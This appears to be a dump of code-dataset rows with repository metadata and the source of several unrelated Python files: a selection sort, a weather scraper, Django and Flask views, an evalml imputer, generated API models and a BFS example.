blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
569976ce007d96645231274a1b5b570bdffd55bc
|
6ada2963ec266fe22c3890b4aa0fae1bd179efbd
|
/排序/低频考点选择排序/SelectSort.py
|
3a9e31a59212f71a3b3d1b1aca331ef7cb508bf0
|
[] |
no_license
|
guohaoyuan/algorithms-for-work
|
e40bc920dbae0436146b590441d4c83d1fb8ab51
|
f1bbd6b3197cd9ac4f0d35a37539c11b02272065
|
refs/heads/master
| 2023-06-20T21:55:46.037990
| 2021-08-06T08:20:05
| 2021-08-06T08:20:05
| 267,294,002
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 500
|
py
|
def SelectSort(nums):
n = len(nums)
if not nums:
return nums
for i in range(n):
# 初始化最小值索引
nMin = i
# 找到i+1..n-1中最小值所在索引
for j in range(i + 1, n):
if nums[j] < nums[nMin]:
nMin = j
# 将最小值索引所在位置放到有序区后
nums[i], nums[nMin] = nums[nMin], nums[i]
if __name__ == '__main__':
nums1 = [5,4,3,2,1]
SelectSort(nums1)
print(nums1)
|
[
"970992936@qq.com"
] |
970992936@qq.com
|
4fece9a10c8b3a7bd61a3ad0fa6e6c520c609d01
|
bb1359ea6000e2d64f66e408aae2197b22b3a4bf
|
/setup.py
|
ff2a71b81bfeba7094a18b34cae7fdeb41e45198
|
[] |
no_license
|
aver007/proc-conveyor
|
34ff575a0750858936a575e5f3187349defcab28
|
2c07ec9f77d7253e97e4cf779962b2b99c948341
|
refs/heads/main
| 2023-02-10T03:03:46.943617
| 2021-01-07T13:49:24
| 2021-01-07T13:49:24
| 327,293,933
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 597
|
py
|
from setuptools import setup, find_packages
with open("README.md", "r") as readme_file:
readme = readme_file.read()
requirements = []
setup(
name="procconveyor",
version="0.0.3",
author="aver",
author_email="a.v.e.r@mail.ru",
description="A package to make conveyor of parallel data processing",
long_description=readme,
long_description_content_type="text/markdown",
url="https://github.com/aver007/proc-conveyor/",
packages=find_packages(),
install_requires=requirements,
classifiers=[
"Programming Language :: Python :: 3.8",
],
)
|
[
"a.v.e.r@mail.ru"
] |
a.v.e.r@mail.ru
|
2e6f87fe63ffda59f760bcfcff3525573e2a2a3b
|
a9c0d5962138e54932be71d46e6ddf30242f874a
|
/evalml/pipelines/components/transformers/imputers/target_imputer.py
|
cd91575090fd467e44b7c1c1098cf13cfdb72185
|
[
"BSD-3-Clause"
] |
permissive
|
ObinnaObeleagu/evalml
|
b7ddaea238fce3278266a756d0d3173a5ea3ad96
|
3b5bf62b08a5a5bc6485ba5387a08c32e1857473
|
refs/heads/main
| 2023-06-29T05:00:57.351501
| 2021-07-28T14:01:24
| 2021-07-28T14:01:24
| 390,377,439
| 1
| 0
|
BSD-3-Clause
| 2021-07-28T14:17:26
| 2021-07-28T14:17:25
| null |
UTF-8
|
Python
| false
| false
| 4,818
|
py
|
from functools import wraps
import pandas as pd
from sklearn.impute import SimpleImputer as SkImputer
from evalml.exceptions import ComponentNotYetFittedError
from evalml.pipelines.components import ComponentBaseMeta
from evalml.pipelines.components.transformers import Transformer
from evalml.utils import (
_retain_custom_types_and_initalize_woodwork,
infer_feature_types,
)
class TargetImputerMeta(ComponentBaseMeta):
"""A version of the ComponentBaseMeta class which handles when input features is None"""
@classmethod
def check_for_fit(cls, method):
"""`check_for_fit` wraps a method that validates if `self._is_fitted` is `True`.
It raises an exception if `False` and calls and returns the wrapped method if `True`.
"""
@wraps(method)
def _check_for_fit(self, X=None, y=None):
klass = type(self).__name__
if not self._is_fitted and self.needs_fitting:
raise ComponentNotYetFittedError(
f"This {klass} is not fitted yet. You must fit {klass} before calling {method.__name__}."
)
else:
return method(self, X, y)
return _check_for_fit
class TargetImputer(Transformer, metaclass=TargetImputerMeta):
"""Imputes missing target data according to a specified imputation strategy.
Arguments:
impute_strategy (string): Impute strategy to use. Valid values include "mean", "median", "most_frequent", "constant" for
numerical data, and "most_frequent", "constant" for object data types. Defaults to "most_frequent".
fill_value (string): When impute_strategy == "constant", fill_value is used to replace missing data.
Defaults to None which uses 0 when imputing numerical data and "missing_value" for strings or object data types.
random_seed (int): Seed for the random number generator. Defaults to 0.
"""
name = "Target Imputer"
hyperparameter_ranges = {"impute_strategy": ["mean", "median", "most_frequent"]}
"""{
"impute_strategy": ["mean", "median", "most_frequent"]
}"""
modifies_features = False
modifies_target = True
def __init__(
self, impute_strategy="most_frequent", fill_value=None, random_seed=0, **kwargs
):
parameters = {"impute_strategy": impute_strategy, "fill_value": fill_value}
parameters.update(kwargs)
imputer = SkImputer(strategy=impute_strategy, fill_value=fill_value, **kwargs)
super().__init__(
parameters=parameters, component_obj=imputer, random_seed=random_seed
)
def fit(self, X, y):
"""Fits imputer to target data. 'None' values are converted to np.nan before imputation and are
treated as the same.
Arguments:
X (pd.DataFrame or np.ndarray): The input training data of shape [n_samples, n_features]. Ignored.
y (pd.Series, optional): The target training data of length [n_samples].
Returns:
self
"""
if y is None:
return self
y = infer_feature_types(y).to_frame()
# Convert all bool dtypes to category for fitting
if (y.dtypes == bool).all():
y = y.astype("category")
self._component_obj.fit(y)
return self
def transform(self, X, y):
"""Transforms input target data by imputing missing values. 'None' and np.nan values are treated as the same.
Arguments:
X (pd.DataFrame): Features. Ignored.
y (pd.Series): Target data to impute.
Returns:
(pd.DataFrame, pd.Series): The original X, transformed y
"""
if X is not None:
X = infer_feature_types(X)
if y is None:
return X, None
y_ww = infer_feature_types(y)
y_df = y_ww.ww.to_frame()
# Return early since bool dtype doesn't support nans and sklearn errors if all cols are bool
if (y_df.dtypes == bool).all():
return X, _retain_custom_types_and_initalize_woodwork(
y_ww.ww.logical_type, y
)
transformed = self._component_obj.transform(y_df)
if transformed.shape[1] == 0:
raise RuntimeError("Transformed data is empty")
y_t = pd.Series(transformed[:, 0], index=y_ww.index)
return X, _retain_custom_types_and_initalize_woodwork(y_ww.ww.logical_type, y_t)
def fit_transform(self, X, y):
"""Fits on and transforms the input target data.
Arguments:
X (pd.DataFrame): Features. Ignored.
y (pd.Series): Target data to impute.
Returns:
(pd.DataFrame, pd.Series): The original X, transformed y
"""
return self.fit(X, y).transform(X, y)
|
[
"noreply@github.com"
] |
ObinnaObeleagu.noreply@github.com
|
1a896dc28ce4ced3fec850b05826db2ed69b1f3c
|
f23efb6ae136f7a5c9124807bb5561ddfb6e76d6
|
/get-weather-data updated minneapolis.py
|
fd698c4dc908ee14bc1b668e56b1ff445d1bcd97
|
[] |
no_license
|
amschons/Python-Data-Mining
|
5998c12ef3ee96a711f46130c8dabd433b78386b
|
1528ca0d434424fc956cf40e59fb3ae5bf28e977
|
refs/heads/master
| 2021-01-16T10:25:34.496974
| 2020-02-28T03:37:16
| 2020-02-28T03:37:16
| 243,081,487
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,063
|
py
|
from bs4 import BeautifulSoup
import urllib, urllib.request, time
from urllib.request import Request, urlopen
# Create/open a file called wunder.txt (which will be a comma-delimited file)
f = open('minneapolis-data.txt', 'w')
# Iterate through year, month, and day
for y in range(2018, 2019):
for m in range(1, 13):
for d in range(1, 32):
# Check if leap year
if y%400 == 0:
leap = True
elif y%100 == 0:
leap = False
elif y%4 == 0:
leap = True
else:
leap = False
# Check if already gone through month
if (m == 2 and leap and d > 29):
continue
elif (m == 2 and d > 28):
continue
elif (m in [4, 6, 9, 10] and d > 30):
continue
# Open wunderground.com url
url = "https://www.wunderground.com/history/daily/us/mn/fort-snelling/KMSP/date"+str(y)+ "/" + str(m) + "/" + str(d)
req = Request(url, headers={'User-Agent': 'Chrome/63.0.3239.132'})
page = urlopen(req).read()
soup = BeautifulSoup(page, "html.parser")
# AvgDayTemp = soup.body.nobr.b.string
AvgDayTemp = soup.findAll(attrs={"class":"nobr"})[5].span.string
# Get MaxTemp from page
MaxTemp = spans[6].span.string
#Get MinTemp from page
MinTemp = spans[13].span.string
#Get precip from page
precip = spans[9].span.string
#Get dewpoint from page
dewpoint = spans[8].span.string
# Format month for timestamp
if len(str(m)) < 2:
mStamp = '0' + str(m)
else:
mStamp = str(m)
# Format day for timestamp
if len(str(d)) < 2:
dStamp = '0' + str(d)
else:
dStamp = str(d)
# Build timestamp
timestamp = str(y) + mStamp + dStamp
# Write timestamp and temperature to file
f.write(timestamp + ',' + dayTemp + '\n')
#pause code for a few seconds
time.sleep(3)
# Done getting data! Close file.
f.close()
|
[
"noreply@github.com"
] |
amschons.noreply@github.com
|
4284532b66837296269e49b95c780a3711beeef6
|
556bf04696deb7226661bf09df59b858a7d05cff
|
/ProyectoCarnet/ProyectoCarnet/urls.py
|
ec2315b48e42c5ecde4a8b2ab5418f9a85d79a50
|
[] |
no_license
|
Maxi78-star/ProyectoCarnet
|
469f604761cbaeecfa0c77d751f2ca5a4f01af5a
|
0cc71b3fb7a086422d9af611337bc18f380061e1
|
refs/heads/master
| 2022-12-17T00:04:38.510951
| 2020-09-07T18:20:23
| 2020-09-07T18:20:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 756
|
py
|
"""ProyectoCarnet URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
|
[
"lucascar007@gmail.com"
] |
lucascar007@gmail.com
|
629159ba52f417906f5bb6cc4601b105867512b8
|
74482894c61156c13902044b4d39917df8ed9551
|
/cryptoapis/model/list_omni_transactions_by_block_height_response_item_senders.py
|
a069a0dc3dc1c953c0673e13e17bfe8dc8044370
|
[
"MIT"
] |
permissive
|
xan187/Crypto_APIs_2.0_SDK_Python
|
bb8898556ba014cc7a4dd31b10e24bec23b74a19
|
a56c75df54ef037b39be1315ed6e54de35bed55b
|
refs/heads/main
| 2023-06-22T15:45:08.273635
| 2021-07-21T03:41:05
| 2021-07-21T03:41:05
| 387,982,780
| 1
| 0
|
NOASSERTION
| 2021-07-21T03:35:29
| 2021-07-21T03:35:29
| null |
UTF-8
|
Python
| false
| false
| 7,262
|
py
|
"""
CryptoAPIs
Crypto APIs 2.0 is a complex and innovative infrastructure layer that radically simplifies the development of any Blockchain and Crypto related applications. Organized around REST, Crypto APIs 2.0 can assist both novice Bitcoin/Ethereum enthusiasts and crypto experts with the development of their blockchain applications. Crypto APIs 2.0 provides unified endpoints and data, raw data, automatic tokens and coins forwardings, callback functionalities, and much more. # noqa: E501
The version of the OpenAPI document: 2.0.0
Contact: developers@cryptoapis.io
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from cryptoapis.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
class ListOmniTransactionsByBlockHeightResponseItemSenders(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
additional_properties_type = None
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
'address': (str,), # noqa: E501
'amount': (str,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'address': 'address', # noqa: E501
'amount': 'amount', # noqa: E501
}
_composed_schemas = {}
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, address, amount, *args, **kwargs): # noqa: E501
"""ListOmniTransactionsByBlockHeightResponseItemSenders - a model defined in OpenAPI
Args:
address (str): Represents the hash of the address that provides the funds.
amount (str): Defines the amount of the sent funds as a string.
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.address = address
self.amount = amount
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
|
[
"kristiyan.ivanov@menasoftware.com"
] |
kristiyan.ivanov@menasoftware.com
|
ddd782644d54dc416f234e5963dc3d4a507117b2
|
244ecfc2017a48c70b74556be8c188e7a4815848
|
/res/scripts/client/gui/scaleform/daapi/view/meta/referralreferrerintrowindowmeta.py
|
74b474d33d70854685ec4e30e04785d04176fbd3
|
[] |
no_license
|
webiumsk/WOT-0.9.12
|
c1e1259411ba1e6c7b02cd6408b731419d3174e5
|
5be5fd9186f335e7bae88c9761c378ff5fbf5351
|
refs/heads/master
| 2021-01-10T01:38:36.523788
| 2015-11-18T11:33:37
| 2015-11-18T11:33:37
| 46,414,438
| 1
| 0
| null | null | null | null |
WINDOWS-1250
|
Python
| false
| false
| 859
|
py
|
# 2015.11.18 11:55:12 Střední Evropa (běžný čas)
# Embedded file name: scripts/client/gui/Scaleform/daapi/view/meta/ReferralReferrerIntroWindowMeta.py
from gui.Scaleform.framework.entities.abstract.AbstractWindowView import AbstractWindowView
class ReferralReferrerIntroWindowMeta(AbstractWindowView):
def onClickApplyButton(self):
self._printOverrideError('onClickApplyButton')
def onClickHrefLink(self):
self._printOverrideError('onClickHrefLink')
def as_setDataS(self, data):
if self._isDAAPIInited():
return self.flashObject.as_setData(data)
# okay decompyling c:\Users\PC\wotsources\files\originals\res\scripts\client\gui\scaleform\daapi\view\meta\referralreferrerintrowindowmeta.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2015.11.18 11:55:12 Střední Evropa (běžný čas)
|
[
"info@webium.sk"
] |
info@webium.sk
|
0664321ec6bb6e160de4796989e888b1495f9241
|
c7adbb31dd6ca54c32d5e4eaf8c7479f5d5147a2
|
/src/battalion/autodoc.py
|
e21839fa0739e82c88db94027b71d5393124afd4
|
[
"MIT"
] |
permissive
|
rocktavious/battalion
|
7ba8e4f5325e76fc3798acd029b5a7e5c07a30bf
|
1364bf8a17b354e67c7c9db17989e39e8bab9a39
|
refs/heads/master
| 2020-04-06T06:58:36.909682
| 2016-02-12T16:56:41
| 2016-02-12T16:56:41
| 31,448,476
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,923
|
py
|
from __future__ import absolute_import
import logging
from inspect import getdoc, cleandoc, isclass
from .base import BaseCommand
from .handler import HandlerMarker
from .utils import get_command_args, get_command_spec
LOG = logging.getLogger(__name__)
class AutoDocCommand(BaseCommand):
"""
Class that supports generating the docopt docstrings for the class and
it's command functions.
"""
class State:
column_padding = 30
def __init__(self):
super(AutoDocCommand, self).__init__()
if self.__doc__ is None:
self.__doc__ = """"""
# We check if autodoc has already happend so that
# so that test frameworks can keep generating new
# instances of the same class without redocumenting
# which will cause a failure
if not hasattr(self, "__autodoc__"):
self.generate_class_doc()
self.generate_commands_doc()
self.set_autodoc(self.docstring)
@classmethod
def set_autodoc(cls, docstring):
cls.__autodoc__ = docstring
@property
def docstring(self):
return cleandoc(self.__autodoc__)
def generate_class_doc(self):
LOG.debug('Documenting %s', self.name)
new_doc = getdoc(self) or """{0}""".format(self.name)
new_doc += "\n\n"
new_doc += self.generate_usage()
new_doc += self.generate_options()
new_doc += self.generate_commands()
self.__autodoc__ = cleandoc(new_doc)
def generate_commands_doc(self):
for name, func in self.commands.items():
if isclass(func) and issubclass(func, HandlerMarker):
LOG.debug('Documenting Command %s', name)
self.commands[name] = func()
else:
LOG.debug('Documenting Command %s', name)
new_command_doc = getdoc(func) or """{0}""".format(name)
new_command_doc += "\n\n"
new_command_doc += self.generate_command_usage(name, func)
new_command_doc += self.generate_command_options(func)
func.__autodoc__ = cleandoc(new_command_doc)
self.commands[name] = func
def generate_usage(self):
docstring = ""
if "Usage:" not in self.__doc__:
docstring += "Usage:\n"
docstring += " {0} [options] <command> [<args>...]\n".format(self.name)
docstring += " {0} [options]\n\n".format(self.name)
return docstring
def generate_options(self):
if "Options:" not in self.__doc__:
docstring = "Options:\n"
for flags, desc in self._state.options:
docstring += " {0:<{2}} {1}\n".format(flags,
desc,
self._state.column_padding)
docstring += "\n"
return docstring
def generate_commands(self):
if "Commands:" not in self.__doc__:
docstring = "Commands:\n"
for k, v in self.commands.items():
docstring += " {0:<{2}} {1}\n".format(k,
getdoc(v),
self._state.column_padding)
docstring += "\n"
return docstring
def generate_command_usage(self, name, command):
docstring = ""
if command.__doc__ is None or "Usage:" not in command.__doc__:
docstring += "Usage:\n {0} [options]\n".format(name)
args = get_command_args(command)
spec = get_command_spec(command)
if args:
docstring += " {0} ".format(name)
for arg_name in args:
if spec[arg_name] is not None:
docstring += "[<{0}>] ".format(arg_name)
else:
docstring += "<{0}> ".format(arg_name)
docstring += "\n"
docstring += "\n"
return docstring
def generate_command_options(self, command):
docstring = ""
if command.__doc__ is None or "Options:" not in command.__doc__:
args = get_command_spec(command)
if args:
docstring += "Options:\n"
for arg, default in args.items():
flag_def = "--{0}=<{1}>".format(arg,
arg.upper())
docstring += " {0:<{3}} {1} [default: {2}]\n".format(flag_def,
' ',
default,
self._state.column_padding)
docstring += "\n"
return docstring
|
[
"kyle.rockman@mac.com"
] |
kyle.rockman@mac.com
|
a28f0d2eec4575032824f25a67eb200a4bf0eded
|
6f452f316d0efe21d713dca1fea8d2ff6b9cec4d
|
/week3-homework/day0x12/run.py
|
af977f62f7fc1d78c0e77e7d76e6bfabe76cba2c
|
[] |
no_license
|
Qingyaya/python-S2
|
6901babee1179822c84e0c9c6f94d322190f2a94
|
eac4eaf818fdd9afa05950394599211305b1bd00
|
refs/heads/master
| 2021-01-20T12:16:45.126346
| 2017-09-25T16:20:24
| 2017-09-25T16:20:24
| 101,709,084
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 350
|
py
|
#-*- coding:utf-8 -*-
from flask import Flask
from flask import render_template
import json
app = Flask(__name__)
@app.route('/')
def hello_world():
file = open('test.json','r+')
file_text=file.read()
file_text = dict(json.loads(file_text))
return render_template('real.html',data=file_text)
if __name__ == '__main__':
app.run(debug=True)
|
[
"shashaxiaoge@163.com"
] |
shashaxiaoge@163.com
|
bdfd14d14304c356823395ce7952ae3075594c07
|
0abd812a50ba3330734fcbb0088a74c5ad6735a2
|
/breadth-first-search/bfs.py
|
423ec23b5d3dfe5433e2d6d4e8b312e43421fa24
|
[] |
no_license
|
scMarth/Learning
|
a914af6f6327454234e5f98dfc8cf95d6d4f8077
|
ae696461c2c8edc9944879503cce01d525cf4ce0
|
refs/heads/master
| 2023-08-03T05:13:03.162533
| 2023-07-28T22:58:51
| 2023-07-28T22:58:51
| 120,689,926
| 2
| 0
| null | 2022-12-11T13:14:07
| 2018-02-08T00:33:42
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,086
|
py
|
class Node(object):
def __init__(self, value):
self.value = value
self.children = []
def bfs(node, searching_for):
unvisited = []
visited = []
unvisited.append(node)
while unvisited != []:
curr_node = unvisited.pop(0) # remove and return item 0
print(curr_node.value)
if curr_node.value == searching_for:
return curr_node
for child in curr_node.children:
if child in visited:
continue
if child not in unvisited:
unvisited.append(child)
visited.append(curr_node)
a = Node("A")
b = Node("B")
c = Node("C")
d = Node("D")
e = Node("E")
f = Node("F")
g = Node("G")
h = Node("H")
a.children.append(b)
a.children.append(c)
b.children.append(d)
b.children.append(e)
c.children.append(f)
c.children.append(g)
e.children.append(h)
result = bfs(a, "H")
print(result)
print(result.value)
'''
A
/ \
B C
/ \ / \
D E F G
|
H
'''
|
[
"vlantaca@gmail.com"
] |
vlantaca@gmail.com
|
a88915a21da701b82de03cc99e7b2670f76d2b6a
|
a4c6dd040b96a8b351fa555fab3f660e8f74e924
|
/college/users/views.py
|
1e9be0fdc8c9926a897abe7719d2bb1505435d68
|
[] |
no_license
|
lambusandeep29/interview-task
|
277fff674ce0840e8af6e5e51cdd891b7e8c47f5
|
054aad2baf2d03330d78486237f316cd5e4a5524
|
refs/heads/main
| 2023-03-21T02:49:11.282118
| 2021-03-10T10:33:34
| 2021-03-10T10:33:34
| 346,321,300
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,999
|
py
|
from django.shortcuts import render
from rest_framework import generics, status
from rest_framework.response import Response
from rest_framework_simplejwt.views import TokenViewBase
from .permissions import IsAdmin, IsStudent, IsTeacher
# Create your views here.
from .models import User
from .serializers import UserLoginSerializer, UserRefreshTokenSerializer, UserSerializer, \
ResetPasswordSerializer, AddUserSerializer, ListStudentSerializer
class LoginAPIView(TokenViewBase):
serializer_class = UserLoginSerializer
class RefreshTokenApiView(TokenViewBase):
serializer_class = UserRefreshTokenSerializer
class GetUserFromEmail(generics.ListAPIView):
serializer_class = UserSerializer
permission_classes = []
def get_queryset(self):
return User.objects.filter(email=self.kwargs['email'])
def list(self, request, *args, **kwargs):
queryset = self.filter_queryset(self.get_queryset())
serializer = self.get_serializer(queryset, many=True)
if not serializer.data:
return Response({}, status=status.HTTP_400_BAD_REQUEST)
return Response(serializer.data, status=status.HTTP_200_OK)
class ResetPassword(generics.CreateAPIView):
serializer_class = ResetPasswordSerializer
queryset = User.objects.all()
permission_classes = []
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
return Response({}, status=status.HTTP_201_CREATED)
class UserListCreateApiView(generics.ListCreateAPIView):
serializer_class = AddUserSerializer
queryset = User.objects.all()
permission_classes = [IsAdmin | IsTeacher]
class ListStudentsApiView(generics.ListAPIView):
serializer_class = ListStudentSerializer
permission_classes = [IsStudent]
def get_queryset(self):
return User.objects.filter(user_type=User.USER_TYPE_STUDENT)
|
[
"lambusandeep29@gmail.com"
] |
lambusandeep29@gmail.com
|
41bf2e1ac07b069d10926ef5e0e04ca1b17115fc
|
7b437e095068fb3f615203e24b3af5c212162c0d
|
/enaml/wx/wx_toolkit_object.py
|
280c0ed530eb8a10ffe97619b83d71ddfa0c89b1
|
[
"BSD-3-Clause"
] |
permissive
|
ContinuumIO/enaml
|
d8200f97946e5139323d22fba32c05231c2b342a
|
15c20b035a73187e8e66fa20a43c3a4372d008bd
|
refs/heads/master
| 2023-06-26T16:16:56.291781
| 2013-03-26T21:13:52
| 2013-03-26T21:13:52
| 9,047,832
| 2
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,594
|
py
|
#------------------------------------------------------------------------------
# Copyright (c) 2013, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#------------------------------------------------------------------------------
import wx
from atom.api import Typed
from enaml.widgets.toolkit_object import ProxyToolkitObject
class WxToolkitObject(ProxyToolkitObject):
""" A Wx implementation of an Enaml ProxyToolkitObject.
"""
#: A reference to the toolkit widget created by the proxy.
widget = Typed(wx.Object)
#--------------------------------------------------------------------------
# Initialization API
#--------------------------------------------------------------------------
def create_widget(self):
""" Create the toolkit widget for the proxy object.
This method is called during the top-down pass, just before the
'init_widget()' method is called. This method should create the
toolkit widget and assign it to the 'widget' attribute.
"""
self.widget = wx.Object()
def init_widget(self):
""" Initialize the state of the toolkit widget.
This method is called during the top-down pass, just after the
'create_widget()' method is called. This method should init the
state of the widget. The child widgets will not yet be created.
"""
pass
def init_layout(self):
""" Initialize the layout of the toolkit widget.
This method is called during the bottom-up pass. This method
should initialize the layout of the widget. The child widgets
will be fully initialized and layed out when this is called.
"""
pass
#--------------------------------------------------------------------------
# ProxyToolkitObject API
#--------------------------------------------------------------------------
def init_top_down(self):
""" Initialize the proxy tree for the top-down pass.
"""
self.create_widget()
self.init_widget()
def init_bottom_up(self):
""" Initialize the proxy tree for the bottom-up pass.
"""
self.init_layout()
def destroy(self):
""" A reimplemented destructor.
This destructor will drop the reference to the toolkit widget.
"""
if self.widget:
try:
self.widget.Destroy()
except AttributeError:
pass
del self.widget
super(WxToolkitObject, self).destroy()
#--------------------------------------------------------------------------
# Public API
#--------------------------------------------------------------------------
def parent_widget(self):
""" Get the parent toolkit widget for this object.
Returns
-------
result : wxObject or None
The toolkit widget declared on the declaration parent, or
None if there is no such parent.
"""
parent = self.parent()
if parent is not None:
if parent.widget:
return parent.widget
def child_widgets(self):
""" Get the child toolkit widgets for this object.
Returns
-------
result : iterable of wxObject
The child widgets defined for this object.
"""
for child in self.children():
if child.widget:
yield child.widget
|
[
"sccolbert@gmail.com"
] |
sccolbert@gmail.com
|
544c64522277631404326eeb304e2a5d5f03898f
|
fcd7f75c0d8c02160ac1a6bdc8e0020fe61a59ac
|
/apps/usuario/models.py
|
cd25eeb02a9e36922663c5e6cb6c7ab95fe832e6
|
[] |
no_license
|
KevinFernandoVidal/Reto4-Datetime
|
2a2d6668eb077f8155d2997001ce54c5e6843309
|
110c0d38505b5f66f55531a70177bb0944178c0f
|
refs/heads/main
| 2023-08-15T17:08:00.380183
| 2021-10-17T23:12:11
| 2021-10-17T23:12:11
| 418,275,677
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 451
|
py
|
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Persona(models.Model):
cedula = models.IntegerField(unique=True)
nombre = models.CharField(max_length=100)
apellido = models.CharField(max_length=100)
telefono = models.IntegerField(null=True, blank=True)
id_user = models.OneToOneField(User, on_delete=models.CASCADE)
def __str__(self):
return self.nombre
|
[
"kefevimi@gmail.com"
] |
kefevimi@gmail.com
|
1d1db61384515c6227ccc9f8acd8f51139c80d47
|
6cce75b61bec5762cfdef7fee3c5f3b5ec4960ae
|
/Corrfunc/bases/dcosmo.py
|
170d804f7e520ec5fa115be8d3720f7a04502816
|
[
"MIT"
] |
permissive
|
abbyw24/Corrfunc
|
1321d372ca97076daad389410701e0b908f7cc51
|
d9c821bcebd7225cf43ec9e09dfe817387c73f62
|
refs/heads/master
| 2022-11-26T17:45:47.553308
| 2020-07-31T22:29:13
| 2020-07-31T22:29:13
| 285,667,263
| 0
| 0
|
MIT
| 2020-08-06T20:40:12
| 2020-08-06T20:40:11
| null |
UTF-8
|
Python
| false
| false
| 1,523
|
py
|
import numpy as np
from nbodykit.lab import cosmology
from utils import partial_derivative
def write_bases(rmin, rmax, saveto, ncont=300, **kwargs):
bases = get_bases(rmin, rmax, ncont=ncont, **kwargs)
np.savetxt(saveto, bases.T)
nprojbins = bases.shape[0]-1
return nprojbins, saveto
